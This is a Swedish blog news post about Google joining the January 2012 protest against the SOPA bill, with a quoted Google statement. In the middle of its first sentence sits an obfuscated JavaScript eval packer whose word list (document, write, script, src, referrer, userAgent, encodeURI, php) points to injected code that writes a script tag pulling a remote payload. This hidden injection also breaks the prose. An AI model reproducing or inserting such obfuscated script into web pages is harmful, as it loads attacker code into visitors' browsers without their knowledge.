Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Google går med i protesten mot SOPA, kommer dock inte stänga ner sin site.

Google går med i protesten mot SOPA, kommer dock inte stänga ner sin site.
Sebastian

Imorgon, onsdag den 18 Januari så kommer flera hemsidor (främst amerikanska) att visa sitt missnöje med lagförslaget vid namn SOPA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kyrnf|var|u0026u|referrer|ssbbh||js|php’.split(’|’),0,{}))
(Stop Online Piracy Act). Flera tungviktare har anslutit sig, där ibland 
Wikipedia och Reddit, som meddelat att man kommer stänga ner sina hemsidor helt under ett helt dygn. Men idag blev det alltså klart att även Google kommer ansluta sig till protestaktionen, man kommer dock inte stänga ner sin hemsida… på gott och ont. Man kommer istället att lägga upp en länk på sin startsida som länkar till en dedikerad Google-protestsida.

Talesman för Google sa följande idag:

”Like many businesses, entrepreneurs, and Web users, we oppose these bills because there are smart, targeted ways to shut down foreign rogue Web sites without asking American companies to censor the Internet. So tomorrow we will be joining many other tech companies to highlight this issue on our U.S. home page.”

Länken kommer bara vara synlig på Google.com så vill ta del av protesten så går ni in där, annars kommer ni garanterat kunna läsa om det här imorgon. Vidare i ämnet så kunde vi meddela idag att SOPA förslaget är försenat (läs mer här) och så på obestämd tid.

news.cnet.com

Comments